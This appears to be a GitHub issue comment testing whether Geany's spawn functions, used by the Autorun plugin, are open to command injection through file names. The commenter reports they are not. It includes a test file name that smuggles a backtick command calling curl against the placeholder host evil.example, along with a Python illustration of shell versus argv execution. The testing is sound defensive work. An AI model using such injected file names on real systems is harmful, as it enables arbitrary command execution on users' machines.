WrapEarnPass left a comment (geany/geany-plugins#1584)

Does [geany](https://www.geany.org/manual/reference/spawn_8h.html) spawn_sync or spawn_with_callbacks suffer from this vulnerability by default?

geany/testing,now 2.1-2 from Debian.

Autorun@ecb8948276418a7eef897b5adb516181a5c72706 (before g_shell_quote was shoved in as a mitigation)

src/spawn.c@229 ```spawn_with_callbacks(current_cmd->working_dir, current_cmd->command, NULL``` an unescaped "command with arguments" put in the command and not the argv of spawn_with_callbacks

src/spawn.c@287 ```spawn_sync(current_cmd->working_dir, current_cmd->command, NULL``` an unescaped "command with arguments" put in the command and not the argv of spawn_sync
Action performed: save file ```'test`curl evil.example |tee test.file`.c'```, which should invoke the Autorun C Before-Save@287 and On-Save@229 commands.

Safe results: Command not runnable, or a clang-format and clang-tidy error.

Indication of compromise: A curl error about evil.example, or test.file creation in WD.

Actual results:

<img width="1359" height="525" alt="Image" src="https://github.com/user-attachments/assets/1398fd44-1cd1-4ad6-a544-76e1df666416" />

No test.file was created. Both spawn_with_callbacks and spawn_sync are not vulnerable regardless of whether or not the command is escaped.

Since the ```g_spawn_command_line_sync``` and other invocations are not geany library calls, I would have to rely on the maintainer of each plugin to determine they have used those calls correctly, as I am not familiar with them.

I am updating the initial list to remove the known non-impacted library calls.
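An added illustration (not part of the comment above and not Geany's code) of the distinction this test probes: the same command string either split into argv and executed directly, or handed to `/bin/sh -c`. It assumes argv-style tokenization, modelled here with Python's `shlex.split`; the file name, the `marker` indicator file and the `echo` stand-in command are constructed.

```python
import os
import shlex
import subprocess
import tempfile

# Constructed file name modelled on the test case; the embedded command
# only writes a local file named "marker" (no network access).
FILENAME = "test`echo hit > marker`.c"
QUIET = dict(stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)


def run_argv(command_line, cwd):
    """Tokenize the string into argv and execute it without a shell."""
    argv = shlex.split(command_line)  # backticks remain literal characters
    try:
        subprocess.run(argv, cwd=cwd, check=False, **QUIET)
    except OSError:
        pass  # "command not runnable" is one of the safe outcomes
    return argv


def run_shell(command_line, cwd):
    """Pass the same string to /bin/sh -c, which expands `...`."""
    subprocess.run(command_line, shell=True, cwd=cwd, check=False, **QUIET)


def marker_created(runner, quote=False):
    """Run the stand-in command in a fresh working directory and report
    whether the indicator file appeared there."""
    with tempfile.TemporaryDirectory() as wd:
        name = shlex.quote(FILENAME) if quote else FILENAME
        runner("echo -- " + name, wd)  # stand-in for the formatter/linter call
        return os.path.exists(os.path.join(wd, "marker"))


if __name__ == "__main__":
    for runner in (run_argv, run_shell):
        for quote in (False, True):
            print(runner.__name__, "quoted" if quote else "unquoted",
                  "marker created:", marker_created(runner, quote))
```

Only the unquoted string passed through the shell creates the indicator file; quoting matters for shell-backed calls, while the argv path never interprets the backticks.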
